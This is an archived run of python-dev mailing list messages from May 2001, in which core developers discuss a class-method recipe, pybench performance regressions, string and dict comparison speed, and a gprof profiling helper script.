http://www.python.org/~guido/) From James_Althoff at i2.com Fri May 18 21:10:11 2001 From: James_Althoff at i2.com (James_Althoff at i2.com) Date: Fri, 18 May 2001 12:10:11 -0700 Subject: [Python-Dev] Re: Simulating Class (was Re: Does Python have Class methods) Message-ID: Python-dev'ers, Pardon the intrusion, but Aahz Maruch suggested that I post this to the python-dev list. The message below illustrates "yet another class method recipe" that Costas synthesized (and which I then modified very slightly) from various posts following another discussion on python-list about class methods (as we all await the "type/class healing" stuff some of you are working on -- go team!). This variant uses explicit "metaclasses" (defined as regular classes) whose instances ("meta objects") point to class objects (since they cannot *be* class objects in current Python). Anyway, I think the approach has some nice properties. Best regards, Jim ----- Forwarded by James Althoff/AMER/i2Tech on 05/18/01 11:23 AM ----- James Althoff To: python-list at python.org 05/14/01 02:09 cc: PM Subject: Re: Simulating Class (was Re: Does Python have Class methods)(Document link: James Althoff) Costas writes: >Ok, so after looking thru how Python works and comments from people, I >came up with what I believe may be the best way to implement Class >methods and Class variables. > > > >Costas I think this idea is quite good. I would amend it very slightly by suggesting the convention of defining *three* separate names in the enclosing module: 1) the name of the enclosing class 2) the name of the singleton instance of the enclosing class 3) the name of the enclosed class To support this, I would propose using a naming convention as below. If one is interested in defining a class Spam, then use the following names: 1) SpamMetaClass -- names the enclosing class 2) SpamMeta -- names a singleton instance of the enclosing class 3) Spam -- names the enclosed class Use the name SpamMetaClass when you need to derive a subclass of SpamMetaClass, e.g., class SpecialSpamMetaClass(SpamMetaClass): pass Use the name SpamMeta to invoke a class method, e.g., SpamMeta.aClassMethod() Use the name Spam to make instances as usual, e.g., s = Spam() (and to derive a subclass of Spam). Although SpamMetaClass is not a metaclass in the sense of Smalltalk or Ruby -- that is to say, the class Spam is not an instance of SpamMetaClass -- nonetheless, SpamMetaClass still acts as a "higher level" class that provides methods on behalf of the class Spam where said methods are 1) independent of any particular instance of Spam and 2) allow for factory-method-style creation of Spam instances -- these being two very important attributes of the metaclass concept. Plus "meta" is a nice, short name. :-) Plus using "MetaClass" to refer to the class and "Meta" to refer to the singleton instance of "MetaClass" is reasonably clear and succinct, I think. One nice thing about the proposed recipe is that the SpamMeta object is a real class instance of a real class. This means that -- unlike when using the "module function" recipe -- we get inheritance of methods, and -- unlike when using the "callable wrapper class" recipe -- we also get override of methods. The example below illustrates both of these important capabilities. class Class1MetaClass: # Base metaclass # Define "class methods" for Class1 def whoami(self): print 'Class1MetaClass.whoami:', self def new(self): # Factory method """Return a new instance""" return self.Class1() def newList(self,n=3): # Another factory method """Return a list of new instances""" l = [] for i in range(n): newInstance = self.new() l.append(newInstance) return l # Define Class1 & its "instance methods" class Class1: # Base class def whoami(self): print 'Class1.whoami:', self Class1Meta = Class1MetaClass() # Make & name the singleton metaclass instance Class1 = Class1Meta.Class1 # Make the Class1 name accessible class Class2MetaClass(Class1MetaClass): # Derived metaclass # Define "class methods" for Class2 -- Override Class1 "class methods" def whoami(self): print 'Class2MetaClass.whoami:', self def new(self): # Override the factory method return self.Class2() # Define Class2 & its "instance methods" class Class2(Class1): # Derived class def whoami(self): print 'Class2.whoami:', self Class2Meta = Class2MetaClass() # Make & name the singleton metaclass instance Class2 = Class2Meta.Class2 # Make the Class2 name accessible # Test Class1Meta.whoami() # invoke "class method" of base class Class2Meta.whoami() # invoke "class method" of derived class Class1().whoami() # make an instance & invoke "instance method" Class2().whoami() print Class1Meta.newList() # factory method print Class2Meta.newList() # inherit factory method with override >>> reload(meta6) Class1MetaClass.whoami: Class2MetaClass.whoami: Class1.whoami: Class2.whoami: [, , ] [, , ] Jim From tim.one at home.com Fri May 18 21:26:02 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 18 May 2001 15:26:02 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B0509BF.A2F84A30@lemburg.com> Message-ID: [MAL] > It [pybench] doesn't claim "typical use". pybench is aimed at finding > out performance issues about hot-spots -- there's no such thing as > a "typical program", so pybench gives you low level performance > compares for very specific tasks, e.g. dictionary creation or > for-loop performance. > > I have found it to be rather successful at that. At least gives > some good hints at where to look... There must be a misunderstanding here. I understand and appreciate all that! From tim.one at home.com Fri May 18 21:48:33 2001 From: tim.one at home.com (Tim Peters) Date: Fri, 18 May 2001 15:48:33 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <20010518111559.A22344@glacier.fnational.com> Message-ID: [Neil Schemenauer] > A table of keys and values. Values are looked up by looping over > the table comparing each key until the correct one is found (ie. > its O(n) where n is the size of the table). For Python, the cost > of doing compares probably outweighs the cost of doing the > hashing, even for small tables. I thought about that before. The inlining appeals but the algorithm not much: the dict implementation *as is* loops over all the table entries too, except that instead of starting with "i = 0" it starts (now) with "i = hash & mask"; instead of incrementing via "++i" it does "i <<= 1; if (i > mask) i ^= poly"; and instead of giving up when "i >= length" it punts when finding an entry with a null value. Incrementing via ++i is certainly cheaper, except that even when small, the hash table usually hits on the first try when the key is present, so usually gets out before incrementing. > Its not clear to me though if it would be a win. Best guess is not. > Assuming that interned strings are the most common key, a assocation > table with four entries would take on average two pointer compares > to look up a value. Actually an average of 2.5 when the key is present and each key is equally likely to be queried, and always 4 when the queried key is not present. The hash table has better expected stats on both counts, but needs 4 unused slots too to achieve that. The savings would be in memory for small dicts more than in time (if at all). From jeremy at alum.mit.edu Fri May 18 23:07:37 2001 From: jeremy at alum.mit.edu (Jeremy Hylton) Date: Fri, 18 May 2001 17:07:37 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns Message-ID: <200105182107.RAA16214@cliff.concentric.net> I did some profiles of more of the pybench slowdowns this afternoon and found a few causes for several problem benchmarks. I just made a couple of small changes for BuiltinFunctionCalls. The problem here is that PyCFunction calls were optimized for flags == 0 and not flags == METH_VARARGS, which is more common. The scary thing about BuiltinFunctinoCalls is that the profiler shows it spending almost 30% of its time in PyArg_ParseTuple(). It certainly is a shame that we have this complicated, slow run-time parsing mechanism to deal with a static property of the code, namely how many arguments it takes and whether their types are. A few of the other tests, SimpleComplexArithmetic and CreateStringsWithConcat, are slower because of the new coercion logic. I didn't spend much time on SimpleComplexArithmetic, but I did look at CreateStringsWithConcat in some detail. The basic problem is that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls PyNumber_Add("ab", "cd"). This function tries all sorts of different ways to coerce the strings into addable numbers before giving up and trying sequence concat. It looks like the new coercion rules have optimized number ops at the expense of string ops. If you're writing programs with lots of numbers, you probably think that's peachy. If you're parsing HTML, perhaps you don't :-). I looked at the test suite to see how often it is called with non-number arguments. The answer is 77% of the time, but almost all of those calls are from test_unicodedata. If that one test is excluded, the majority of the calls (~90%) are with numbers. But the majority of those calls just come from a few tests -- test_pow, test_long, test_mutants, test_strftime. If I were to do something about the coercions, I would see if there was a way to quickly determine that PyNumber_Add() ain't gonna have any luck. Then we could bail to things like string_concat more quickly. I also looked at SmallLists. It seems that the only significant change since 1.5.2 is the garbage collection. This tests spends a lot more time deallocating lists than it used to, and the only change I see in the code is the GC. I assume, but haven't checked, that the story is similar for SmallTuples. So the primary things that have slowed down since 1.5.2 seem to be: comparisons, coercion, and memory management for containers. These also seem to be the things that have improved the most in terms of features, completeness, etc. Looks like we need to revisit them and sort out the performance issues. Jeremy From guido at digicool.com Fri May 18 23:58:25 2001 From: guido at digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 17:58:25 -0400 Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: Your message of "Fri, 18 May 2001 17:07:37 EDT." <200105182107.RAA16214@cliff.concentric.net> References: <200105182107.RAA16214@cliff.concentric.net> Message-ID: <200105182158.QAA01250@cj20424-a.reston1.va.home.com> > The scary thing about BuiltinFunctinoCalls is that the profiler shows > it spending almost 30% of its time in PyArg_ParseTuple(). It > certainly is a shame that we have this complicated, slow run-time > parsing mechanism to deal with a static property of the code, namely > how many arguments it takes and whether their types are. I would love to see a mechanism whereby the signature of a C function could be stored as part of the static info about it, in an extension of the PyMethodDef structure: this would serve as documentation, allow for introspection, etc. I'm sure Ping would love this for pydoc and his inspect module. But I'm not sure how much we can speed things up, unless we give up on the tuple interface (an argc/argv API could be much faster since usually the arguments are already on the frame's stack in this form). > A few of the other tests, SimpleComplexArithmetic and > CreateStringsWithConcat, are slower because of the new coercion > logic. I didn't spend much time on SimpleComplexArithmetic, but I did > look at CreateStringsWithConcat in some detail. The basic problem is > that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls > PyNumber_Add("ab", "cd"). This function tries all sorts of different > ways to coerce the strings into addable numbers before giving up and > trying sequence concat. > > It looks like the new coercion rules have optimized number ops at the > expense of string ops. If you're writing programs with lots of > numbers, you probably think that's peachy. If you're parsing HTML, > perhaps you don't :-). > > I looked at the test suite to see how often it is called with > non-number arguments. The answer is 77% of the time, but almost all > of those calls are from test_unicodedata. If that one test is > excluded, the majority of the calls (~90%) are with numbers. But the > majority of those calls just come from a few tests -- test_pow, > test_long, test_mutants, test_strftime. > > If I were to do something about the coercions, I would see if there > was a way to quickly determine that PyNumber_Add() ain't gonna have > any luck. Then we could bail to things like string_concat more > quickly. There's already a special case for int+int in the BINARY_ADD opcode (otherwise you would probably see more numbers). Maybe another special case for str+str would help here? > I also looked at SmallLists. It seems that the only significant > change since 1.5.2 is the garbage collection. This tests spends a lot > more time deallocating lists than it used to, and the only change I > see in the code is the GC. I assume, but haven't checked, that the > story is similar for SmallTuples. > > So the primary things that have slowed down since 1.5.2 seem to be: > comparisons, coercion, and memory management for containers. These > also seem to be the things that have improved the most in terms of > features, completeness, etc. Looks like we need to revisit them and > sort out the performance issues. Thanks for doing all this work, Jeremy! I just hope that these performance hacks won't have to be redone when I'm done with healing the types/class split. I'm expecting that things can become a lot simpler if everything inherits from Object, sequences inherit from Sequence, and so on. But since I'm currently going slow on this work, I won't complain too much if the existing code gets optimized first. The stuff you already checked in looks good! --Guido van Rossum (home page: http://www.python.org/~guido/) From jeremy at digicool.com Sat May 19 00:06:05 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Fri, 18 May 2001 18:06:05 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182158.QAA01250@cj20424-a.reston1.va.home.com> References: <200105182107.RAA16214@cliff.concentric.net> <200105182158.QAA01250@cj20424-a.reston1.va.home.com> Message-ID: <15109.40141.757071.770265@slothrop.digicool.com> In case anyone else is interested, here are two quick pointers on running pybench tests under the profiler. 1. To build Python with profiling hooks (Unix only): LDFLAGS="-pg" OPT="-pg" configure make When you run python it produces a gmon.out file. To run gprof, pass it the profile-enable executable and gmon.out. It's spit out the results on stdout. 2. Use this handy script (below) to run a single pybench test under the profiler and produce the output. Jeremy """Tool to automate profiling of individual pybench benchmarks""" import os import re import tempfile PYCVS = "/home/jeremy/src/python/dist/src/build-pg/python" PY152 = "/home/jeremy/src/python/dist/Python-1.5.2/build-pg/python" rx_grep = re.compile('^([^:]+):(.*)') rx_decl = re.compile('class (\w+)\(\w+\):') def find_bench(name): p = os.popen("grep %s *.py" % name) for line in p.readlines(): mo = rx_grep.search(line) if mo is None: continue file, text = mo.group(1, 2) mo = rx_decl.search(text) if mo is None: continue klass = mo.group(1) return file, klass return None, None def write_profile_code(file, klass, path): i = file.find(".") file = file[:i] f = open(path, 'w') print >> f, "import %s" % file print >> f, "%s.%s().run()" % (file, klass) f.close() def profile(interp, path, result): if os.path.exists("gmon.out"): os.unlink("gmon.out") os.system("PYTHONPATH=. %s %s" % (interp, path)) if not os.path.exists("gmon.out"): raise RuntimeError, "gmon.out not generated by %s" % interp os.system("gprof %s gmon.out > %s" % (interp, result)) def main(bench_name): file, klass = find_bench(bench_name) if file is None: raise ValueError, "could not find class %s" % bench_name code_path = tempfile.mktemp() write_profile_code(file, klass, code_path) profile(PYCVS, code_path, "%s.cvs.prof" % bench_name) profile(PY152, code_path, "%s.152.prof" % bench_name) os.unlink(code_path) if __name__ == "__main__": import sys main(sys.argv[1]) From jim at interet.com Sat May 19 18:45:15 2001 From: jim at interet.com (James C. Ahlstrom) Date: Sat, 19 May 2001 12:45:15 -0400 Subject: [Python-Dev] [off topic] Python is taking over the world Message-ID: <3B06A31B.67A8D010@interet.com> I was in my local (Sommerville, NJ) Borders book store last week and noticed that they stocked many Python books, most in multiple copies. It all added up to three feet of Python books. Great. The clincher was when I went to my YMCA, and saw that someone had posted a flyer offering tutoring in Math, Physics, Java and Python. Congratulations to Guido and all on this list. JimA From guido at digicool.com Sun May 20 01:18:25 2001 From: guido at digicool.com (Guido van Rossum) Date: Sat, 19 May 2001 19:18:25 -0400 Subject: [Python-Dev] Off-topic: So long, and thanks for all the fish Message-ID: <200105192318.TAA02405@cj20424-a.reston1.va.home.com> For all you Douglas Adams fans out there: Douglas Noel Adams 1952 - 2001 http://www.douglasadams.com --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Sun May 20 11:31:25 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 05:31:25 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> Message-ID: [M0artin v. Loewis] > ... > If I set tp_richcompare of strings to 0, I get past this code, and do > > c = (*f)(v, w); > if (PyErr_Occurred()) Note that the usual way to write this is if (c < 0 && PyErr_Occurred()) More work for my artificial "ab" < "cd" case but a net win in real life (when c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas, when c < 0 there's no way in the cmp protocol to use c's value alone to distinguish between "less than" and "error"). > return NULL; > return convert_3way_to_object(op, c); > > Here, I get 3 function calls: f is string_compare, then > PyErr_Occurred, finally convert_3way_to_object, which converts > {-1,0,1} x Op -> {Py_True, Py_False}. Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. > Indeed, when I inline convert_3way_to_object, I get the same speed in > both cases (with the remaining differences attributed to measurement > and gcc doing register usage differently in both functions). OK, understood, and thanks for following up! > I'd still be in favour of giving strings a richcompare, since it > allows to optimize what I think is the single most frequent case: > Py_EQ on strings. In the absence of significant sorting, I agreed Py_EQ is most frequent. > With a control flow like > > if (a->ob_size != b->ob_size) > goto False; > > if (a->ob_size == 0) > goto True; > > if (a->ob_sval[0] != b->ob_sval[0]) > goto False; > > if(memcmp(a->ob_sval, b->ob_sval, a->ob_size)) > goto False; > else > goto True; > > we can reduce the number of function calls Suggest collapsing the third into the first: if (a->ob_size != b->ob_size || a->ob_sval[0] != b->ob_sval[0]) goto False; There's no danger of over-indexing when ob_size==0, because it doesn't include the trailing null byte Python always sticks at the end of string objects; and the first-byte check is much more likely to pay off than the zero-length check (comparison to a null string? gotta be rare as clear conclusions ), and better to test for the more common case first. From tim.one at home.com Sun May 20 11:54:08 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 05:54:08 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de> Message-ID: [Tim] >> 1. String objects are also equal despite being different objects, >> if their ob_sinterned pointers are equal and non-NULL. So if >> you're looking for every trick in & out of the book, that's >> another one. [Martin v. Loewis] > That does not help. In the entire test suite, there are 0 instances > where strings are compared which are not identical, but have equal > ob_sinterned pointers. Good to know. Had you tried this a few weeks ago, there would have been thousands (it so happened that one-character strings weren't being interned *effectively*, and there were lots of 1-character cases then where #1 applied; that's been fixed; good to know more aren't popping up). > ... > Whether there's a fruitless branch depends on your compiler. A branch instruction is a branch instruction; I didn't distinguish between taken and non-taken branches, as there's no uniformity in codegen across platforms. > With gcc 3, you can write > > if (__builtin_expect(a == b, 0)) { > > and then the body of the if block will be moved out of the way of > linear control flow. I don't think we'll be littering Python with compiler-specific hacks. It's good to get the less common case out-of-line, but it's not a pure win: while it reduces the penalty when the test doesn't pay, it also reduces the benefit when it does pay (by the wildly architecture-dependent cost of taking a mispredicted out-of-line branch, and the wildly compiler-dependent costs of how seriously they take their own decisions or user hints to out-of-line a block (e.g., the compiler may refetch everything from memory again at the target if it thinks it's truly rare)). >> Any idea where those 800,000 virgin calls to oldcomp are coming >> from? That's a lot. > As far as I could trace it, most of them come from lookdict_string (at > various locations inside this function). Ah! Of course. string_compare is hardwired into lookdict_string. This case may be important enough to merit a distinct _PyString_Equal function, with just the stuff lookdict_string needs (e.g., there's never a gain in testing for pointer equality when called from lookdict_string because the dict code already checked that; but there may be a gain for that test in an all-purpose string_richcompare). > ... > So to support sorting better, I should special-case Py_LT in > string_richcompare also, to avoid the function call ?-) Of course. string_richcompare has to do a memcmp to resolve Py_EQ and Py_NE anway, and that's most of the work for resolving all 6 possibilities. Get rid of string_compare entirely! [on cmp sloth] > Yes, that is a serious problem. Fortunately, very few calls in my > programs go to string_compare through cmp() now. But then, your > programs are different, of course... There are search-tree modules I have but didn't write that do this; I don't care enough about them to frustrate Guido's grand vision > It may be more important for sequences other than 8-bit strings, as each call to a comparison function for a pair of non-string sequences is very expensive (involving more layers of calls for each element comparison). From tim.one at home.com Sun May 20 12:13:14 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 06:13:14 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I have always thought that eventually (but long before Py3K!) all > objects would only support rich comparisons and the __cmp__ and > tp_compare slots would become completely obsolete. If the time machine batteries can hold a full charge, you may want to go back and add Py_CMP as a seventh possible desired-operation argument to tbe rich comparison API. My experience with dict comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full cmp, so I put the dict oldcmp back in order to avoid having dict richcmp (potentially) compute cmp 3 times to fake one cmp. But if dict richcmp knew a cmp outcome was desired, it could compute it with no extra work to speak of. Then there would be no reason at all to hold on to the dict tp_compare slot. The list and tuple richcmps are also doing almost all the work needed to compute a 3-way cmp outcome. From tim.one at home.com Sun May 20 13:05:53 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 07:05:53 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B037D27.E258C363@lemburg.com> Message-ID: [M.-A. Lemburg] > ... > Running the same test for 2.1 vs. 2.0 there's not much to > notice, so the important changes seem to be originating in > the move from 1.5.2 to 2.0. IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for 1.5.2, and Fredrik did more independently (like inlining high-frequency int operations in the eval loop). Also IIRC, that's the last time any concerted effort was put into speeding Python. 1.5.2 was an efficiency peak, then, and unstable equilibrium never endures without deliberate and persistent rebalancing work. If Python were "a real product", it would be at least one person's full-time job to keep it in peak shape. But it's not even a part-time job for anyone, and I don't see that changing. In compensation, machines have gotten faster much quicker than Python has slowed. From mal at lemburg.com Sun May 20 13:50:17 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 20 May 2001 13:50:17 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B07AF79.6EB42E54@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > ... > > Running the same test for 2.1 vs. 2.0 there's not much to > > notice, so the important changes seem to be originating in > > the move from 1.5.2 to 2.0. > > IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for > 1.5.2, and Fredrik did more independently (like inlining high-frequency int > operations in the eval loop). Also IIRC, that's the last time any concerted > effort was put into speeding Python. 1.5.2 was an efficiency peak, then, and > unstable equilibrium never endures without deliberate and persistent > rebalancing work. If Python were "a real product", it would be at least one > person's full-time job to keep it in peak shape. But it's not even a > part-time job for anyone, and I don't see that changing. In compensation, > machines have gotten faster much quicker than Python has slowed. How about making performance the main "feature" for 2.3 then ?! 2.0 - 2.2 introduced many new features in the interpreter core, so I think it's time to stabilize those features and focus on making Python regain the performance it had before those features were introduced. At least to some of us, performance is an issue and I think that there's a lot we can do to improve it. One way to open up the field for better performance will be to modularize the interpreter, so that new ways of optimization can be explored, e.g. truning the VM a register machine (Skip once started looking into this with his Rattlesnake patches) or creating specialized VMs which can then be used by optimizing compilers as targets. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh at python.net Sun May 20 13:52:40 2001 From: mwh at python.net (Michael Hudson) Date: 20 May 2001 12:52:40 +0100 Subject: [Python-Dev] Comparison speed In-Reply-To: "Tim Peters"'s message of "Sun, 20 May 2001 05:54:08 -0400" References: Message-ID: "Tim Peters" writes: > Ah! Of course. string_compare is hardwired into lookdict_string. > This case may be important enough to merit a distinct > _PyString_Equal function, with just the stuff lookdict_string needs Or just inlining it all into lookdict_string, something like: Index: Objects/dictobject.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/dictobject.c,v retrieving revision 2.90 diff -c -r2.90 dictobject.c *** Objects/dictobject.c 2001/05/19 07:04:38 2.90 --- Objects/dictobject.c 2001/05/20 11:51:28 *************** *** 279,286 **** register unsigned int mask = mp->ma_size-1; dictentry *ep0 = mp->ma_table; register dictentry *ep; - cmpfunc compare = PyString_Type.tp_compare; /* make sure this function doesn't have to handle non-string keys */ if (!PyString_Check(key)) { #ifdef SHOW_CONVERSION_COUNTS --- 279,287 ---- register unsigned int mask = mp->ma_size-1; dictentry *ep0 = mp->ma_table; register dictentry *ep; + #define S(s) ((PyStringObject*)(s)) + /* make sure this function doesn't have to handle non-string keys */ if (!PyString_Check(key)) { #ifdef SHOW_CONVERSION_COUNTS *************** *** 299,305 **** freeslot = ep; else { if (ep->me_hash == hash ! && compare(ep->me_key, key) == 0) { return ep; } freeslot = NULL; --- 300,308 ---- freeslot = ep; else { if (ep->me_hash == hash ! && S(ep->me_key)->ob_size == S(key)->ob_size ! && memcmp(S(ep->me_key)->ob_sval, ! S(key)->ob_sval,S(key)->ob_size) == 0) { return ep; } freeslot = NULL; *************** *** 318,324 **** if (ep->me_key == key || (ep->me_hash == hash && ep->me_key != dummy ! && compare(ep->me_key, key) == 0)) return ep; else if (ep->me_key == dummy && freeslot == NULL) freeslot = ep; --- 321,329 ---- if (ep->me_key == key || (ep->me_hash == hash && ep->me_key != dummy ! && S(ep->me_key)->ob_size == S(key)->ob_size ! && memcmp(S(ep->me_key)->ob_sval, ! S(key)->ob_sval,S(key)->ob_size) == 0)) return ep; else if (ep->me_key == dummy && freeslot == NULL) freeslot = ep; *************** *** 327,332 **** --- 332,339 ---- if (incr > mask) incr ^= mp->ma_poly; /* clears the highest bit */ } + + #undef S } /* (apologies for the use of the preprocessor...). I'll leave it to someone else to work out if this is a win or not... -- >> REVIEW OF THE YEAR, 2000 << It was shit. Give us another one. -- NTK Know, 2000-12-29, http://www.ntk.net/ From tim.one at home.com Sun May 20 14:57:11 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 08:57:11 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B07AF79.6EB42E54@lemburg.com> Message-ID: [MAL] > How about making performance the main "feature" for 2.3 then ?! Guido may be a dictator, but he doesn't have a magic wand -- "the main feature" is what people volunteer to do and then fight for and then actually do. > 2.0 - 2.2 introduced many new features in the interpreter core, > so I think it's time to stabilize those features and focus on > making Python regain the performance it had before those features > were introduced. At least to some of us, performance is an > issue and I think that there's a lot we can do to improve it. "Performance" is meaningless unless quantified and made concrete: what is it that runs too slowly? "Everything" is not a useful answer. Speeding up line-at-a-time input was an example of something that worked, via focus and measurement and pushing ahead despite opposition. I doubt any other approach will bear fruit over such a short timeframe, and especially not without resources to throw at it. > One way to open up the field for better performance will be > to modularize the interpreter, so that new ways of optimization > can be explored, e.g. truning the VM a register machine > (Skip once started looking into this with his Rattlesnake > patches) or creating specialized VMs which can then be used > by optimizing compilers as targets. Restructure the core for the benefit of optimizing compilers that don't exist? That sounds like an interesting research project, but not much to do with making 2.3 faster. In the meantime, modularization is more likely to make the VM that does exist slower. could-be-it's-easy-answers-or-none-ly y'rs - tim From tim.one at home.com Sun May 20 14:58:09 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 08:58:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Message-ID: [Michael Hudson] > ... > (apologies for the use of the preprocessor...). I'll leave it to > someone else to work out if this is a win or not... Umm, but that's the *hard* part. I think even Guido knows how to do a string compare inline . From tim.one at home.com Sun May 20 15:09:50 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 20 May 2001 09:09:50 -0400 Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182107.RAA16214@cliff.concentric.net> Message-ID: [Jeremy Hylton] > ... > The scary thing about BuiltinFunctinoCalls is that the profiler shows > it spending almost 30% of its time in PyArg_ParseTuple(). It > certainly is a shame that we have this complicated, slow run-time > parsing mechanism to deal with a static property of the code, namely > how many arguments it takes and whether their types are. Special-casing the snot out of "O" looks like a winner : count format %total cumulative% ------- -------- ------ ----------- 1440897 'O' 47.45 47.45 327694 'O!' 10.79 58.24 285570 'O|i' 9.40 67.65 262168 'O!|O' 8.63 76.28 227405 'l' 7.49 83.77 146537 's#' 4.83 88.60 76779 'OO|O' 2.53 91.12 65682 '|ss' 2.16 93.29 48033 'OO' 1.58 94.87 39879 'O|O&O&' 1.31 96.18 Those are the top 10 formats passed to PyArg_ParseTuple() during the test suite, after stripping ";" and ":" decorations. fast-paths-on-the-overtired-brain-ly y'rs - tim From aahz at rahul.net Sun May 20 15:50:08 2001 From: aahz at rahul.net (Aahz Maruch) Date: Sun, 20 May 2001 06:50:08 -0700 (PDT) Subject: [Python-Dev] Comparison speed In-Reply-To: from "Tim Peters" at May 20, 2001 06:13:14 AM Message-ID: <20010520135008.12ABE99C80@waltz.rahul.net> Tim Peters wrote: > > If the time machine batteries can hold a full charge, you may want > to go back and add Py_CMP as a seventh possible desired-operation > argument to tbe rich comparison API. My experience with dict > comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE > any cheaper than by doing a full cmp, so I put the dict oldcmp back in > order to avoid having dict richcmp (potentially) compute cmp 3 times > to fake one cmp. But if dict richcmp knew a cmp outcome was desired, > it could compute it with no extra work to speak of. Then there would > be no reason at all to hold on to the dict tp_compare slot. > > The list and tuple richcmps are also doing almost all the work needed > to compute a 3-way cmp outcome. +1 from me; there's one spot in my new Decimal.py where I optimize an expensive pair of equality tests down to one by using cmp(), and it's likely that similar cases will pop up. When I convert to C code, I'll want to keep doing that. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From martin at loewis.home.cs.tu-berlin.de Sun May 20 15:48:43 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 20 May 2001 15:48:43 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de> > string_compare() could special-case pointer equality too, although I suspect > doing so would be a net loss. I've done some measurements here, too, again taking your example from time import clock indices = [1] * 1000000 def doit(): s = clock() for i in indices: "ab" < "ab" f = clock() return f - s for i in xrange(10): print "%.3f" % doit() This is the case where testing for identity helps. Running it without identity test takes 0.74s, running it with identity test takes 0.68s. Now, looking at the case of non-identical pointers, I could not find any measurable difference. After increasing the number of rounds by a factor of ten, I got, without identity test 6.920 6.920 6.910 6.970 7.080 6.920 6.920 6.910 6.930 6.920 With identity test, I got 6.930 6.930 6.920 7.080 6.920 6.930 6.960 6.930 6.920 6.920 That still does not look like a significant difference to me. Regards, Martin From guido at digicool.com Sun May 20 15:56:54 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 20 May 2001 09:56:54 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Sun, 20 May 2001 06:13:14 EDT." References: Message-ID: <200105201356.JAA08372@cj20424-a.reston1.va.home.com> > If the time machine batteries can hold a full charge, you may want to go back > and add Py_CMP as a seventh possible desired-operation argument to tbe rich > comparison API. Funny, I was thinking about this too last night. > My experience with dict comparisons was that dict_richcompare > couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full > cmp, so I put the dict oldcmp back in order to avoid having dict > richcmp (potentially) compute cmp 3 times to fake one cmp. But if > dict richcmp knew a cmp outcome was desired, it could compute it > with no extra work to speak of. Then there would be no reason at > all to hold on to the dict tp_compare slot. I'm not sure I see the saving. There's no real saving in time, because you still have to make separate calls for EQ and CMP, right? There might be a saving in code, but you could solve that internally in dictobject.c by restructuring the code somewhat so that dict_compare shared more with dict_richcompare, right? It's mostly an API streamlining. The other difference between tp_compare and tp_richcompare is that the latter returns an object which makes testing for errors unambiguous. But (for several releases) we would still have to support tp_compare for b/w compatibility with old 3r party extensions. > The list and tuple richcmps are also doing almost all the work needed to > compute a 3-way cmp outcome. Ditto. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Sun May 20 18:19:29 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 20 May 2001 18:19:29 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B07EE91.5747F4F4@lemburg.com> Tim Peters wrote: > > [MAL] > > How about making performance the main "feature" for 2.3 then ?! > > Guido may be a dictator, but he doesn't have a magic wand -- "the main > feature" is what people volunteer to do and then fight for and then actually > do. I will certainly go back to the basics and redo my optimization patches for Python later this year. Whether or not these will get included in the core is another story, but I have a need for a fast interpreter for my app. server and can't afford losing too much performance when moving from 1.5.x to 2.x. > > 2.0 - 2.2 introduced many new features in the interpreter core, > > so I think it's time to stabilize those features and focus on > > making Python regain the performance it had before those features > > were introduced. At least to some of us, performance is an > > issue and I think that there's a lot we can do to improve it. > > "Performance" is meaningless unless quantified and made concrete: what is it > that runs too slowly? "Everything" is not a useful answer. Speeding up > line-at-a-time input was an example of something that worked, via focus and > measurement and pushing ahead despite opposition. I doubt any other approach > will 